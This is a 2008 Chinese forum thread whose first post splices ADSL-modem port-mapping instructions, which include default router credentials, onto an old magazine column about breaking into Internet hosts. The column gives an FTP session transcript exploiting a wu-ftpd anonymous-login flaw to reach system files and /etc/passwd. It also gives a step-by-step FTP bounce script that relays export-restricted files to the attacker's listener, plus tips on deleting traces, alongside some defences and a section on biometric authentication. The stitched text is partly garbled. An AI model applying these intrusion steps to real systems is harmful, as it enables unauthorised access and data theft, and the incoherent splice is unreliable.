无我居士 发表于 2008-1-9 11:58 只看TA 1楼 |
---|
|
[交流] 如 何 入 侵 一 台 Internet 上 的 主 机 EM老是跑在低ID上,着实让人心急,看了很多帖子,我终于明白,使用全创AL1100-11(白色)被设置成路由的我要进行端口的映射,找来找去没找到完全符合的帖子,也有很多朋友在找,经过一番摸索,终于实现了高ID的梦想,现在将经验和大家一起分享,也让使用全创ADSLMODEM的朋友和我一样愉快的赶骡。在IE地址栏里键入http://192.168.0.2,如果你没改动过,用户名和密码应该分别为:admin;12345678。 在“配置”栏里点击“虚拟服务器”,在“公共端口”、“私有端口”处都填上“4662”,“端口类型”选择TCP,主机IP地址填上你机器的静态IP地址,然后点击“添加此设置”。 还是在“配置”栏,点击“保存设置”,点击“提交”,等待MODEM重新启动,然后启动你的骡子,看看你的ID状态,肯定让你兴奋!!! 如何入侵一台Internet上的主机 在网路上受到攻击是难免的,虽说道高一尺,魔高一丈, 对于网路上的主机,还是得小心防治才是。 ■黄力尧 敬告读者:为避免有心人士以本期讲解之方式入侵他人系统, 入侵方式之关键技术部份并不予以详细说明,仅讲解其流程。 而且内容并未讲解如何避免他人追查入侵者之方式,若是贸然使用 这些方式入侵他人系统很有可能被抓到,请读者不要轻易尝试。 一台网路上的电脑所可能面临之网路入侵 上期本专栏曾讲解过密码学概论以及其破解方式,本期专栏将为您 讲解要如何入侵一台Internet上的主机。当一个入侵者要侵入(或破坏) 一台网路上的主机时,一般会由下列几种方式达成他的目的: 1.找出该网路主机上的伺服程式是否设计缺陷并有可供入侵之处。 2.找出该网路主机所使用的通信协定是否有先天上的安全漏洞。 3.藉由某种手段使该网路主机瘫痪。 4.困扰对方主机上的系统管理员或使用者,降低对方工作能力。 因为这些攻击都是从网路上来的,因此如果您或您的公司要避免 受到这些攻击,最简单又快速的方法就是去五金行买把大榔头, 然后对准您的Router或是Modem给它一槌,或是拿把大剪刀把网路线给剪了, 保证全世界最厉害的hacker也拿您的电脑没法子,从此您再也不用担心 网路安全方面的问题(只是可能您也没网路可用了)。 下面将就这几种情况分别予以说明,并有入侵实际过程与入侵原理解说, 并说明其防治方式。 利用伺服程式的缺陷入侵系统 FTP入侵:wu-ftpd2.x版以前安全缺陷(其版次在此不公开)。 wu-ftpd是WashingtonUniversity(美国华盛顿大学)所研发出来的FTP伺服程式, 广泛应用在各型UNIX主机上作为FTP伺服程式.它可以接受一般的用户签入, 也提供以Anonymous或ftp为名的匿名签入以开放主机上的公开档案供大众 Download用。其2.2版本以前有一个很严重的安全缺陷:一个匿名的使用者 经由下列程序也可以取得一般使用者的权限以进入系统磁盘: 1.以任何一个FTPClient端程式连线到使用wu-ftpd2.x版以前架设的FTP站台。 2.要求签入时,使用匿名帐号签入,但不要使用anonymous而使用FTP。 3.在根目录下再次使用chdi/(cd/)命令,即可切换到一般系统目录而不只是 公众目录。 现在在此示范如何入侵网路上的一台please.hack.me主机,实例如下: (中文部份为注解) linux1:~#ftpplease.hack.me Connectedtoplease.hack.me 220hackFTPserver(Versionwu-2.x(x)SunMay14:57:12CDT1993)ready. Name(linux1.twunix.org:root):ftp 331Guestloginok,sendyourcompletee-mailaddressaspassword. Password: 230-Welcome,archiveuser!ThisisanexperimentalFTPserver.Ifhaveany 230-unusualproblems,pleasereportthemviae-mailtoroot@please 230-Ifyoudohaveproblems,pleasetryusingadash(-)asthefirstcharacter 230-ofyourpassword--thiswillturnoffthecontinuationmessagesthatmay 230-beconfusingyourftpclient. 230- 230Guestloginok,accessrestrictionsapply. RemotesystemtypeisUNIX. Usingbinarymodetotransferfiles. ftp>ls-l一般匿名帐号进入后,先查看所在目录内容 200PORTcommandsuccessful. 150OpeningASCIImodedataconnectionfor/bin/ls. total9 drwxrwxr-x8rootwheel1024Sep1109:31. drwxrwxr-x8rootwheel1024Sep1109:31.. drwxrwxr-x2rootwheel1024Sep1109:31bin drwxrwxr-x2rootwheel1024Sep1109:31etc drwxrwxr-x2rootwheel1024Dec31993incoming drwxrwxr-x2rootwheel1024Nov171993lib drwxrwxr-x2rootwheel1024Sep1109:31pub drwxrwxr-x3rootwheel1024Sep1109:31usr -rw-r--r--1rootroot312Aug11994welcome.msg 226Transfercomplete.以一般匿名帐号进入后只能看到公众目录内容 ftp>pwd 257“/”iscurrentdirectory. ftp>cd/虽然已经在根目录下,依然再次切换到/目录 250CWDcommandsuccessful.本来应该是要回应「无此目录」的 (因为已经在最底层)但是依然可以继续切换 ftp>ls-l再次查验现在目录内容 200PORTcommandsuccessful. 150OpeningASCIImodedataconnectionfor/bin/ls. total777 drwxr-xr-x19rootroot1024Oct608:58. drwxr-xr-x19rootroot1024Oct608:58.. drwxr-xr-x2rootbin2048Sep1117:31bin drwxr-xr-x2rootroot1024Sep1117:35boot drwxr-xr-x3rootroot20480Oct1400:03dev drwxr-xr-x9rootroot2048Oct1410:41etc drwxr-xr-x3rootroot1024Oct507:26ext drwxr-xr-x2rootroot1024Sep1109:42floppy drwxr-xr-x8rootroot1024Oct1111:52home drwxr-xr-x3rootroot1024Sep1117:27lib drwxr-xr-x2rootroot12288Sep1117:16lost+found drwxr-xr-x2rootroot1024Jul1013:23mnt dr-xr-xr-x5rootroot0Oct1408:03proc -rw-------1rootroot139424Sep2817:00quota.user drwxr-x--x3rootroot1024Sep2814:07root drwxr-xr-x2rootbin2048Sep1117:31sbin drwxr-xr-x2rootroot1024Sep1117:18shlib drwxrwxrwt3rootroot1024Oct1410:40tmp drwxr-xr-x24rootroot1024Jul81994usr drwxr-xr-x14rootroot1024Sep1117:32var -r--------1rootroot596263Sep1117:33vmlinuz 226Transfercomplete.已经变成一般系统目录了。 ftp> 入侵原理解说: 此一入侵乃是利用FTP公众匿名帐号anonymous,ftp其中后者的ftp正好与系统中 内定的FTP公众帐号目录名称相同,使得系统误以为ftp是一个已经登记的 用户而不是一个公众匿名帐号而使其进入系统目录中。 为什么会有这种现象发生呢?原来FTP伺服程式将连线进来的使用者分为 「匿名帐号」与「正式帐号」。如果是匿名帐号,则系统仅要求其输入 自己的E-Mail或是Ident资料当密码,就可以进入系统中的/home/ftp目录中, 而以/home/ftp当作此类使用者的根目录,这种用anonymous或是ftp当帐号匿名 签入的使用者是没有办法切到系统目录中的(实际的/目录),再怎么下 chdir/命令也只能到/home/ftp为止。 而如果是在/etc/passwd中登记有案的帐号,则以系统中实际的/为其根目录, 此类使用者可以在其权限范围内浏览整颗硬盘。 而因为匿名帐号是以/home/ftp目录为起点,正好与ftp此一匿名帐号相同, 故wu-ftpd2.x版以前的版本会将使用ftp签入的帐号亦视为一般User。 (不过如果是用anonymous此一匿名帐号签入,就不会有这种状况了) 使用ftp帐号并入侵到系统里面以后会有什么好处呢?由于该入侵者 已经可以完整浏览该硬盘,并享有一般User之权限,当然入侵者也可以进到/etc目录下,并读取passwd档案。如果该系统没有做shadow的话,那就可以大大方方地拿走passwd档案,然后回家利用类似上期本专栏所介绍之密码分析程式算出密码来。如果正好还破出root的密码的话,那就…… 入侵防治方式: 1.如果你的ftp伺服程式是wu-ftpd而且版号低于2.4版,请尽快换到2.4版使用。 2.将ftp帐号列入/ftp/ftpusers档案中,让匿名使用者只能利用anonymous此一匿名帐号签入。 3.替系统安装ShadowPassword。 4.再次确认系统中没有叫做ftp或是anonymous的目录。 5.改/etc/inetd.conf档案,关闭FTP服务。 利用通信协定先天上的安全漏洞入侵系统 这次我们依然以FTP程式作为说明,讲解如何由FTP通信程式本身的漏洞来窃取某些敏感性资料。 FTPBounce跳跃攻击法 本范例将讲解如何经由FTP窃取到被限制传送的软体。某一位于美国的FTP主机,暂名为A主机,其IPAddress为a.a.a.a,在其中的/export-restrict目录中放有一禁止出口的密码程式crypt.tar.gz,此目录被设定为只要不是美国本土的主机连线,就无法取得/export-restrict目录中的任何档案。(注一) 现在在台湾有一台C主机,其IPAddress为c.c.c.c,C主机上有一个用户想要连线到A主机去Downloadcrypt.tar.gz这一个编密软体,但是A主机拒绝让C主机传送这个档案。因为A主机经由检查C主机的IPAddress之后,得知C主机并不位在美国,因此不让C主机download这个档案。但是A主机可以用同样的程序检查出哪些主机位于美国,并且让这些主机进去拿资料。 现在假设在美国有一台公众FTP主机,名为B主机,其IPAddress为b.b.b.b,此一B主机开放一个/upload目录让大家放档案上来和其他人分享,任何人都可以放档案到/upload里面,也可以删掉自己所放的档案。 C主机上的这一个用户很想要拿到这个编密软体,但是受限于出口禁令无法拿到这个档案。有一天他发现B主机上有一个/upload目录可以供大家上传shareware档案(亦即是一个大家都可读可写的目录),于是C主机上的这个用户想出了个好点子,利用FTPBounce跳跃攻击法,把B主机当作中介主机来偷到A主机上的crypt.tar.gz档案。 1.首先,该用户以自己机器的真实IPAddress(不能用localhost或是127.x.x.x)连上自己的机器: linux1:~#ftp168.95.109.222 Connectedto168.95.109.222. 220linux1FTPserver(Versionwu-2.4(4)SunJun2222:47:03CDT1997)ready. Name(localhost:root):user1 331Passwordrequiredforuser1. Password: 230Useruser1loggedin. RemotesystemtypeisUNIX. Usingbinarymodetotransferfiles. 2.接下来,使用quote指令将FTP内部命令pasv传送给FTP伺服程式, 使其进入被动模式(PassiveMode) ftp$quotepasv 227EnteringPassiveMode(168,95,109,222,5,243) 刚刚要您使用真实IPAddress连上自己机器而不要用localhost用意即在此, 如果你用localhost连上,则通信是藉由loopback介面来传送, 而不是真实的网路介面,无法得知进入passivemode以后所使用的通信 Port号码。如果用了localhost就会变这样: ftp$quotepasv 227EnteringPassiveMode(127,0,0,1,5,243) 得到这个资讯对我们一点帮助都没有。现在将您刚刚使用pasv 命令所得到的IP位址以及Port数目抄下来,稍后应用(就是168,95,109,222,5,243)。 3.再使用一次quote命令,送出stor指令,并指定要存一个新档案“foo”。 (foo是惯用字,你可以自己取别的名字) 4.现在你的FTP程式应该已经停掉了,暂时别理它(但是别把连线切断, 就让它保持这样) 5.用文字编辑器编辑如下的档案(是一个指令稿,让我们能够遥控B主机 做我们想要做的动作,就好像是我们直接在B主机上操作一个FTPClient程式 一样,右右括号为其解说,编辑时不用打上去): 完成后,将此一档案定一个你喜欢的名字。在这边我们使用command为名称。 6.现在再用FTP连线到B主机去,然后用匿名使用者登录,并且切换到/upload 目录去。刚刚我们已经讲过,B主机的/upload目录是供使用者上传Shareware 或其他资料用的,因此任何人都可以在这边写入资料。现在先使用put 指令将刚刚写好的指令稿command上传到B主机的/upload目录中 (cd/upload;putcommand)。 7.在B主机上再次使用quote命令送出“porta,a,a,a,0,21”这就是A主机的 IPAddress,而且我们指定用21号的Port来传送资料。 8.现在继续使用quote指令送出“retrcommand”将command指令稿的内容列出, 其结果将会变为执行该档案内容。 9.由于command档案中指挥B主机去A主机抓资料(第7步骤时已经将B主机和A 主机连结),而A主机由于从IPAddress查出B主机为美国境内的主机, 因此允许来自B主机的抓档请求。 10.现在检查第三步骤所产生的‘foo’档案,现在应该已经变为crypt.tar.gz, 此一档案之内容,资料窃取成功。 入侵原理解说 由于本例中的A主机不接受美国以外地区的主机撷取关于密码的资料, 因此我们透过一台同样位于美国且具有一个公众目录的B主机来帮我们 抓资料。其关键技术在于利用了B主机的「远端执行」能力, 藉由预先写好的指令稿遥控B主机,为我们到A主机上去抓到我们想要的 资料。 userftp(以ftp为使用者签入,变为匿名使用者) pass-anonymous@(密码用anonymous,并且在前面加上1‘-’ 将对方伺服器(就是稍后要连接的A主机)的显示讯息关掉,避免发生问题。 后面加上@让它看起来比较像是一个E-MailAddress) cwd/export-restrict(切换到/export-restrict目录) typei(切换到二进位模式来传送非文字档案) port168,95,109,222,5,243(将B主机和C主机之间建立一条连线通道,此处 168,95,109,222,5,243就是在第二步骤时所得到之C主机IPAddress与PortNumber) retrcrypt.tar.gz(叫出crypt.tar.gz内容(就是一般拿取档案时的动作) quit(结束连线) AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......(此部份需要满60KBytes, 将双边机器的TCP视窗填满,以避免FTP的控制连接过早被中断。 要注意的是,此一60K左右的无意义资料一行最多250字元时就必须换行, 以免在某些机器上被拒绝。) 而在我们自己的C主机上所使用的ftp程式,其实并不实际做FTP资料的动作, 而只是用来做资料收听而已。我们使用pasv指令以后就会进入FTP程式的 被动模式(PassiveMode),FTP程式将不再主动撷取资料而是进入被动接收资料 的状态。FTP程式在进入被动模式以后会回应一个Port数给我们, 就是上例中的168,95,109,222,5,243。此Port即为进入PsssiveMode以后FTP程式 所收听资料用的Port,如果读者手边有其他能监听指定Port并将收听到的资料 写入档案的工具程式的话,也可以拿来应用,并不一定要用FTP程式, 只是FTP程式人人有,不劳您另外费心寻找一个监听程式。接着, 再送一个stor命令,并指定档名,则指定Port上收听到的资料都会存到 此一档案中。 在第五步骤中所编辑的指令稿,其实就是若我们想要直接到A主机上 去抓编密软体时所会下的指令,但是由于A主机并不允许我们直接去抓, 只好透过一个能到A主机抓资料,且能听从我们指令的主机来代劳, 那就是B主机了。FTPBounce跳跃攻击法的技术重点就在此。 利用一台中介主机帮我们抓资料,但是资料不实际存到中介主机上, 直接送到我们这边来;这就好像是一个跳板一样,我们踩着跳板 到达我们的目的地,但是跳板并不是我们的目标,而且跳板用完以后 就没用了。 而要成为一个可资我们利用的中介主机,必须具备下列两个条件: 1.有一个公众目录,可读可写,用来让我们放入指令稿。 2.可以接受远端执行的动作。 这种主机实在是太多了,像是淡江、东海等大学的AnonymousFTPServer 都有提供一个/incoming或是/upload目录,让大家upload东西上来跟大家分享, 这同时也造就了FTPBounce跳跃攻击法实行成功的绝佳场所。 而远端执行不一定每台FTP主机都能做,因为有些系统管理员怕困扰, 把这项功能关掉了。(故非不能也,实不为也)早期的ftpd程式甚至可以 作一些在Shell下才能做的事情,岂不是很可怕?还有每台主机的指令参数 之使用方法会因为FTPServer程式而略有不同,建议先使用quotehelpport命令 查一下该主机的port命令到底要怎么下才适当,以免无法实行。 而我们将指令稿放上B主机后,先在B主机上以port命令指挥其连上A主机 (porta,a,a,a,0,21),再以指令稿中的内容指挥其登录A主机, 进入A主机存放编密软体的目录。进入目标所在目录后, 再用一次port命令使B主机与自己的C主机连结,然后下retr指令列出 crypt.tar.gz档案内容,由于A、C主机经由以上步骤已经算是透过B主机 连在一起,(还记得前面曾经让C主机上的FTP程式保持在某一Port上的 监听状态?)故只要B主机将A主机上的crypt.tar.gz档案内容给show出来, 马上就会被C主机上的FTP监听程式截取下来,于是crypt.tar.gz就到了 我们手上了。 传送完成以后,记得要清理一下垃圾,把我们放到B主机上的command档案 删掉,以免行迹败露。 接着说明command指令稿中最后附上的一大串AAAAAAAAAAA……的意义。 其实那只是一堆垃圾,随便你填些什么东西都可以, 主要用意在使A主机与B主机之间的连线不要太快关闭, 一个FTP程式共采用两个Port来通信:20与21两个Port,一个是资料通道, 一个是控制通道。FTP指令透过Port21来下,而实际上资料是经由20号 Port来送,要完成FTP资料传送,此两者缺一不可。如果你只用21号port来连, 但是实际上没有20号的资料通道,就算能下命令也没办法读到对方主机上 的资料,来看下面的范例: linux1:/etc#telnetlocalhost20 Trying127.0.0.1...... telnet:Unabletoconnecttoremotehost:Connectionrefused (用20号资料传送Port无法进入,只能用21号的控制命令Port进入) linux1:/etc#telnetlinux1.twunix.org21 Trying10.1.1.1...... Connectedtolinux1.twunix.org. Escapecharacteris‘^]’. 220linux1FTPserver(Versionwu-2.4(4)SunJun2222:47:03CDT1997)ready. userroot 331Passwordrequiredforroot. pass****** 230Userrootloggedin. list 425Can’tbuilddataconnection:Connectionrefused 因为我们实际上是用telnet来连接FTPServer,故只用到21号控制命令通道, 而没有实际的资料连接,虽然可以Login的进去,但是无法抓到资料。 上例中当我们要下list指令列出该主机上的资料时,因为没有资料通道连接 所以无法实行。 在FTPBounce跳跃攻击法的指令稿中,最后会作一个quit的动作以结束连线, 但是这是一个指令稿,所有的指令是一次送上,并非像我们平常在 使用FTP抓资料时是一步一步下命令,一定是先抓完档案才会quit, 所以很有可能在刚下retr指令,资料没传完之前就先把连线给断了。 为此我们在指令稿后面放上一大堆的垃圾,将双边主机的TCPWindow (TCP资料框)给塞满,用以干扰TCP资料流处理程式使其不要那么快把 资料连线给断掉,一般的TCPWindow大概有25K-30K左右的大小, 为了保险起见,我们采用最大的30K,且乘以二 (因为在一条资料路径上有两台主机),后面用以干扰TCP资料流处理程式 而附上的字串每行不要超过250个字元,否则有些FTPServer会将整个指令稿 视为无效资料而丢弃,就无法发挥作用了。 而FTPBounce攻击法只能拿来偷限制出口的资料吗?事实上,只要一台 AnonymousFTP主机设定不妥当,安全漏洞多的话,利用/upload目录可以玩的花样 还更多,除了入侵外,还可以偷别人资料或是把别人的主机给Crash掉, 而且类似的技巧也可以应用在发送根本没有办法查出来源的信件与News, 干扰他人主机效能等。 入侵防治方式: FTPBounce攻击法因为是藉由TCP/IP上FileTransferProtocol本身的漏洞来达成, 除非你不用TCP/IP通信协定,不然都将会遭到FTPBounce或其衍生攻击方式 的攻击,可以做的防治措施如下: 1.避免自己的主机上有会受入侵的服务(干脆把FTP给关了)。 2.不使用TCP/IP通信协定。 而FTPBounce攻击法的中心思想乃是利用防密不周严的主机当中介主机 (也就是替死鬼)来帮自己作破坏行为,别人到时候被入侵了可能抓不到 始作俑者就拿您开刀,因此您可以采用下列措施避免自己的主机变成 替死鬼: 1.不要提供FTP服务,或是仅提供限定功能的FTP(如TIS-FirewallKit之ftpd)。 2.不要开放/upload目录,有时太热心公益也是一种错误(所谓「好心被雷亲」)。 本期专栏因受限于篇幅,在此先告一段落。(注二)网路入侵方式的第三, 四项将在下期专栏讲解。内容有电子邮件伪造与其原理, 如何偷看到其他主机的网路与执行状态,由其他服务得到更多有用的 入侵参考资讯等。如果您真的对系统安全细节有兴趣,欢迎参加我们的 课程或与笔者联络。(作者E-Mail:variox01@ms1.hinet.net) 注一:按美国有密码软体出口禁令,凡是只要牵扯到有关密码的特定程式 都禁止输出。通常禁止出口的都是那些较高难度的密码程式, 简单的密码程式是可以出口的。 注二:本期专栏所列举之入侵方式,部份关键技术已经抽掉, 以避免有心人士滥用在不正当的用途上,只是让您了解入侵方式的概念 与大略方式。因此,如果你不能在您的主机上实行,那是正常的。 上期本专栏曾经提过一般电脑上的使用者宣告与认证方式, 但是受限于篇幅未讲解其他的认证方式,在此特别补述。 电脑系统如何辨识使用者,称为「认证」(Authentication)方式, 包括了使用者身分的宣告与使用者身分确认。前者可用身分表示帐号 或物件,后者认证方式包括密码,生物认证与个人习惯等。 生物认证(BiologicalAuthentication) 生物认证采用每一生物所独有(Unique)之特征以兹识别独立生物个体, 所采用之认证条件必须每一生物个体都不同。生物认证经常采用的方式有: 1.指纹 每个人的指纹都不一样,藉由小型的影像扫描器就可以得到受测者的指纹, 分析后得知是否确实为某人。又由于人类皮肤层会分泌出特别的分泌物, 且会遗留在物体上,早已广泛应用在犯罪追踪上。 2.视网膜 人类视网膜的血管分布亦是每个人都不同,要求受测者目视高解析摄影机, 藉此得到某人的视网膜分布状况来辨别身分。 3.声音 每个人说话的频率、音品、波形均不同,可藉此辨认身分。 但可能因为个人当时身体状况(如感冒、喉痛声哑)而改变声音, 通常会搭配其他方式做辨认,不独立使用。 除了以上的几种方式,其实人身上还有很多独特且可资辨认的地方, 如DNA(细胞遗传物质)、血液、分泌物等。但因为使用这些方式做认证 有其实行上的不便利之处(没有人想要每用一次电脑就得抽一次血吧?) 因此较少采用。 个人习惯(PersonalCustomary) 此类身分认证方式藉由每个人习惯的差异来辨认每个使用者, 通常会和其他认证法搭配使用,以增加认证的可靠性。 1.按键节拍侦测(KetstrokeRhythmSensing) 这是最常用的个人习惯身分认证法,需与密码输入身分认证 一起搭配使用。通常的情况,一个人除非经常改密码, 否则对于每天都要输入一次,乃至于十几次的密码应该是再熟悉也不过了, 就算是多复杂的密码,连续打了几天以后应该也会记牢了。 (如果这样还记不起来,就应该去找医生检查一下自己的头有没有烧坏了) 一个已经熟悉自己密码的人,在键盘上输入起密码来理当是很快的, 不会有还要临时停顿下来找某个键在哪里的情况发生。各位读者可以 试着在自己的键盘上输入下面的字串: 3Prlxu7x&`? 看看要花多久的时间,而且按键的过程中不能按错键喔!这组字串中 混合了大小写,符号以及数字,需要充分的运用到键盘一般字元区 各个角落的按键。如果你能在两秒钟之内按完这组字串而且不出错, 就表示你已经算是「熟悉」了这组字,和自己第一次输入这组字的 时间比比看,差了多久的时间?上面的例子就是让各位读者了解, 熟悉一组字的人和不熟悉的人输入字会有什么样的差异。 而除了输入时间的差异外,输入字的节拍也会因人而有差异。 尤其像上面例子中,每个字元之间在键盘分布的位置都不同, 有人打字可能比较偏重右手,也有人偏重左手,甚至刚学电脑的人 也可能会用「一指神功」来打字。这几种打字方法造成每个人输入每个 字元之间的时间都会有些微的差距,这就是打字的节拍,电脑藉由记录 每个人打字时每个字元的秒差来辨认每个人,密码的真正主人可以在输入 密码的某两个字元之间故意放慢速度,其他人很难知道此项只有本人才 知道的差异。这样就算密码被偷了,入侵者也无法通过按键节拍侦测这 一关。 2.个人签名(PersonalSignature) 同样是写一个字,每个人写出来的样子都不同,除了字型以外, 写字时施力度的大小,写字速度等也会有差异,和按键节拍侦测一样是 一种采用个人习惯来辨认身分的方式。平常写字的字迹可以被模仿, 或是影印下来使用,但是写字时施力大小与写字时每一笔每一划的速度 就不是每个人都模仿得来的了。使用个人签名认证的电脑会提供一支光笔, 可能会附上压力感应以侦测写字时候所施予笔上压力的大小。 |
0 |
a0101001hn 发表于 2008-1-9 13:12 只看TA 2楼 |
---|
废话我看多了,没看过这么废话的。问一句有几个人能看懂,又有几个人能实践上面说的。哼哼,骗分而已,我还以为是什么好帖子,想不到是这么个东西 |
0 |
|
---|